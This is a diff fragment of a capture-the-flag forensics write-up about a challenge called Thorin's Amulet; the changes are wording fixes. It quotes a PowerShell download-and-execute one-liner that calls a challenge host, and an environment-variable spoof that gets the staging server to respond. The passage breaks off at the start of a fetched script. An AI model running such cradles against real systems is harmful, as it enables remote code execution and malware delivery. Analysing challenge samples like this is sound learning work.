thewhitecircle/ctf_writeups/cyber_apocalypse_2025/forensics/ThorinsAmulet.md

     IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")

-But it was not giving a connection unless you had the correct `COMPUTERNAME` environement variable.
+But it was not giving a connection unless you had the correct `COMPUTERNAME` environment variable.
 This will temporarily change it:

     $env:COMPUTERNAME = "WORKSTATION-DM-0043"

-With that we could run the powershell if we wanted, but visiting the url from the challenge docker was enough to get to the next stage which returned an `update.ps1`:
+With that we could run the PowerShell if we wanted, but visiting the URL from the challenge docker was enough to get to the next stage which returned a `update.ps1`:

     function aqFVaq {